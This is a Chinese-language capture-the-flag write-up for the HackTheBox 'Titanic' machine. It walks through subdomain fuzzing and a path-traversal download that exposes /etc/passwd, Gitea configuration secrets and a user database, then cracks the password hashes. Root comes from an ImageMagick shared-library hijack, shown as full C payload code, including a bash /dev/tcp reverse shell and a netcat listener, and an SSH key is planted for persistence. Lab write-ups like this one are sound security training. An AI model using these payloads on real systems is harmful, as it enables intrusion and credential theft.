简记
ip重定向到 http://titanic.htb,先添加hosts
收集子域名
wfuzz -c -u http://titanic.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -H 'Host:FUZZ.titanic.htb' --hl 9
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************Target: http://titanic.htb/
Total requests: 19966=====================================================================
ID Response Lines Word Chars Payload
=====================================================================000000019: 200 275 L 1278 W 13870 Ch "dev"
将dev.titanic.htb也加到hosts
主站是一个预约服务,只有一个功能点,预约服务(右上角点击Book New)
dev子域是一个gitea代码托管平台,有两个代码库
developer/docker-config
developer/flask-app
先测试主站的功能点
使用whatweb查看,显然是一个python站点
$ whatweb http://titanic.htb/
http://titanic.htb/ [200 OK] Bootstrap[4.5.2], Country[RESERVED][ZZ], HTML5, HTTPServer[Werkzeug/3.0.3 Python/3.10.12], IP[10.129.194.71], JQuery, Python[3.10.12], Script, Title[Titanic - Book Your Ship Trip], Werkzeug[3.0.3]
(就是dev子域的那个flask-app)第一次做的时候没注意到,就没审计源码
点击Book New,填写信息,会下载一个json文件。
存在文件下载,我们就可以测试一下是否存在任意文件下载
burp抓包,
POST /book HTTP/1.1
Host: titanic.htb
Content-Length: 75
Cache-Control: max-age=0
Origin: http://titanic.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://titanic.htb/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: closename=aaa&email=aaa%40123.com&phone=17371996889&date=2222-02-02&cabin=Deluxe
(数据随便填),放包
HTTP/1.1 302 FOUND
Date: Wed, 19 Feb 2025 08:46:42 GMT
Server: Werkzeug/3.0.3 Python/3.10.12
Content-Type: text/html; charset=utf-8
Content-Length: 303
Location: /download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json
Connection: close<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json">/download?ticket=17e38735-baf1-43f9-931f-6a1ea16a1503.json</a>. If not, click the link.
可以看到302重定向到/download?ticket=xxxxx
好的,测试任意文件下载,linux机器,选择/etc/passwd
$ curl -s http://titanic.htb/download?ticket=/etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
developer:x:1000:1000:developer:/home/developer:/bin/bash
两个用户,web用户要么是developer,要么是www-data
尝试读取developer目录下的flag (猜测、尝试)
$ curl -s http://titanic.htb/download?ticket=/home/developer/user.txt
21ce83fbxxxxxxxxxxxxxxxxxxxx
确实可以读取到user flag
子域的Gitea版本号为1.22.1,没找到公开的漏洞。继续尝试在任意文件下载这个漏洞上撕开口子,扩大危害。
关注代码托管平台的代码,可能存放的是内网的一些服务
查看提交历史,没有用信息。
developer/docker-config记录了两个服务的Dockerfile文件
version: '3'services:gitea:image: gitea/giteacontainer_name: giteaports:- "127.0.0.1:3000:3000"- "127.0.0.1:2222:22" # Optional for SSH accessvolumes:- /home/developer/gitea/data:/data # Replace with your pathenvironment:- USER_UID=1000- USER_GID=1000restart: always
这个Dockerfile是 Gitea服务的
值的关注的的一点volumes挂载的位置:/home/developer/gitea/data:/data, 将容器内的数据挂在到物理机的/home/developer/gitea/data目录下
通过浏览器搜索“gitea data目录"
data/- 数据目录(APP_DATA_PATH),如果使用文件会话,则不包括会话。该目录包括attachments、avatars、lfs、indexers、如果使用 SQLite 则包括 SQLite 文件。
version: '3.8'services:mysql:image: mysql:8.0container_name: mysqlports:- "127.0.0.1:3306:3306"environment:MYSQL_ROOT_PASSWORD: 'MySQLP@$$w0rd!'MYSQL_DATABASE: tickets MYSQL_USER: sql_svcMYSQL_PASSWORD: sql_passwordrestart: always
这个是msql的dockerfile,有一个密码MySQLP@$$w0rd!,先记录一下。
查看官方文档配置说明 | Gitea Documentation,Linux的默认配置文件路径为/etc/gitea/conf/app.ini。
结合
volumes:- /home/developer/gitea/data:/data
尝试访问
$ curl -s http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/conf/app.ini
APP_NAME = Gitea: Git with a cup of tea
RUN_MODE = prod
RUN_USER = git
WORK_PATH = /data/gitea[repository]
ROOT = /data/git/repositories[repository.local]
LOCAL_COPY_PATH = /data/gitea/tmp/local-repo[repository.upload]
TEMP_PATH = /data/gitea/uploads[server]
APP_DATA_PATH = /data/gitea
DOMAIN = gitea.titanic.htb
SSH_DOMAIN = gitea.titanic.htb
HTTP_PORT = 3000
ROOT_URL = http://gitea.titanic.htb/
DISABLE_SSH = false
SSH_PORT = 22
SSH_LISTEN_PORT = 22
LFS_START_SERVER = true
LFS_JWT_SECRET = OqnUg-uJVK-l7rMN1oaR6oTF348gyr0QtkJt-JpjSO4
OFFLINE_MODE = true[database]
PATH = /data/gitea/gitea.db
DB_TYPE = sqlite3
HOST = localhost:3306
NAME = gitea
USER = root
PASSWD =
LOG_SQL = false
SCHEMA =
SSL_MODE = disable[indexer]
ISSUE_INDEXER_PATH = /data/gitea/indexers/issues.bleve[session]
PROVIDER_CONFIG = /data/gitea/sessions
PROVIDER = file[picture]
AVATAR_UPLOAD_PATH = /data/gitea/avatars
REPOSITORY_AVATAR_UPLOAD_PATH = /data/gitea/repo-avatars[attachment]
PATH = /data/gitea/attachments[log]
MODE = console
LEVEL = info
ROOT_PATH = /data/gitea/log[security]
INSTALL_LOCK = true
SECRET_KEY =
REVERSE_PROXY_LIMIT = 1
REVERSE_PROXY_TRUSTED_PROXIES = *
INTERNAL_TOKEN = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYmYiOjE3MjI1OTUzMzR9.X4rYDGhkWTZKFfnjgES5r2rFRpu_GXTdQ65456XC0X8
PASSWORD_HASH_ALGO = pbkdf2[service]
DISABLE_REGISTRATION = false
REQUIRE_SIGNIN_VIEW = false
REGISTER_EMAIL_CONFIRM = false
ENABLE_NOTIFY_MAIL = false
ALLOW_ONLY_EXTERNAL_REGISTRATION = false
ENABLE_CAPTCHA = false
DEFAULT_KEEP_EMAIL_PRIVATE = false
DEFAULT_ALLOW_CREATE_ORGANIZATION = true
DEFAULT_ENABLE_TIMETRACKING = true
NO_REPLY_ADDRESS = noreply.localhost[lfs]
PATH = /data/git/lfs[mailer]
ENABLED = false[openid]
ENABLE_OPENID_SIGNIN = true
ENABLE_OPENID_SIGNUP = true[cron.update_checker]
ENABLED = false[repository.pull-request]
DEFAULT_MERGE_STYLE = merge[repository.signing]
DEFAULT_TRUST_MODEL = committer[oauth2]
JWT_SECRET = FIAOKLQX4SBzvZ9eZnHYLTCiVGoBtkE4y5B7vMjzz3g
在配置中有sqlite数据库的(PATH = /data/gitea/gitea.db)路径,尝试下载
$ curl http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db --output gitea.db% Total % Received % Xferd Average Speed Time Time Time CurrentDload Upload Total Spent Left Speed
100 2036k 100 2036k 0 0 1878k 0 0:00:01 0:00:01 --:--:-- 1879k
成功下载。查看数据库
可以使用gui工具查看,如sqllitebrowser
或者使用命令行工具
$ sqlite3 gitea.db
sqlite> .tables
<SNIP>
user
<SNIP>
重点关注user表,先查看一下表结构,用户名、密码、密码哈希、加密算法、盐
sqlite> .schema user
sqlite> select name,passwd,passwd_hash_algo,salt from user;
administrator|cba20ccf927d3ad0567b68161732d3fbca098ce886bbc923b4062a3960d459c08d2dfc063b2406ac9207c980c47c5d017136|pbkdf2$50000$50|2d149e5fbd1b20cf31db3e3c6a28fc9b
developer|e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56|pbkdf2$50000$50|8bf3e3452b78544f8bee9400d6936d34
搜一下”gitea password created“,在github上有很多现成的项目可以使用
- dvdknaap/gitea-crack-passwords: Crack GITEA passwords
通过上面/etc/passwd的内容,我们知道在机器上有developer用户,爆破developer对应的密码哈希
$ python3 1.py -s 8bf3e3452b78544f8bee9400d6936d34 -t e531d398946137baea70ed6a680a54385ecff131309c0bd8f225f284406b7cbc8efc5dbef30bf1682619263444ea594cfb56 -w /usr/share/wordlists/rockyou.txt
<SNIP>
<SNIP>
Found password: 25282528
- F4dee3/gitea2hashcat: Script created in Bash to cracked the password of Gitea and export in Hashcat format.
将密码转化为hashcat格式
$ ./gitea2hashcat.sh[+] Usage: ./gitea2hashcat.sh-d) Provide the database file (e.g., gitea.db)-o) Specify the output file-h) Display this help panel
$ ./gitea2hashcat.sh -d gitea.db -o gitea.hashgitea.hash内容如下
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=
使用hashcat爆破
$ hashcat --username gitea.hashes /usr/share/wordlists/rockyou.txt
然后及时ssh登陆,密码是25282528
ssh developer@titanic.htb => 登录成功~
接着就是提权·
sudo -l 起手,必是小丑
在/opt/scripts/目录下发现一个shell文件
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log
问AI:使用 ImageMagick 的 identify 命令提取每个 JPG 文件的元数据信息,最后将这些元数据信息追加写入 metadata.log 文件中
ImageMagick版本信息
developer@titanic:/opt/scripts$ magick --version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)
搜索ImageMagick 7.1.1-35 github poc,第一条就是
poc
在当前工作目录中创建共享库:(/opt/app/static/assets/images/ )
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>__attribute__((constructor)) void init(){system("id");exit(0);
}
EOF
修改system执行的命令,执行一个cat /root/root.txt > /tmp/root.txt
成功拿到flag
弹个shell
gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>__attribute__((constructor)) void init(){system("bash -c '/bin/bash -i >& /dev/tcp/ip/1234 0>&1'");exit(0);
}
EOF
监听nc -lvnp 1234
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [Your-IP] from (UNKNOWN) [Machine] 38172
bash: cannot set terminal process group (6262): Inappropriate ioctl for device
bash: no job control in this shell
root@titanic:/opt/app/static/assets/images# id
id
uid=0(root) gid=0(root) groups=0(root)
简单的权限维持,写公钥
echo 你的公钥 >> ~/.ssh/authorized_keys
然后就可以ssh连接了(不需要密码了)
ssh root@titanic.htb
root@titanic:~# id
uid=0(root) gid=0(root) groups=0(root)
Beyond Root
定时任务
root@titanic:~# crontab -l* * * * * /opt/scripts/identify_images.sh && /root/cleanup.sh
*/10 * * * * /root/revert.sh
在获得普通用户时,就执行ifconfig,发现有docker网卡
现在有root权限了
root@titanic:~# docker ps
docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
069e7799bf90 gitea/gitea "/usr/bin/entrypoint鈥? 6 months ago Up 3 hours 127.0.0.1:3000->3000/tcp, 127.0.0.1:2222->22/tcp gitea
然后就可以进入到容器里面看看了(docker exec -it 069 bash)
Blog原贴地址
![sass报错:[sass] Undefined variable. @import升级@use语法注意事项](https://i-blog.csdnimg.cn/direct/48260e7337e84c2ab492ee0a720baa92.png)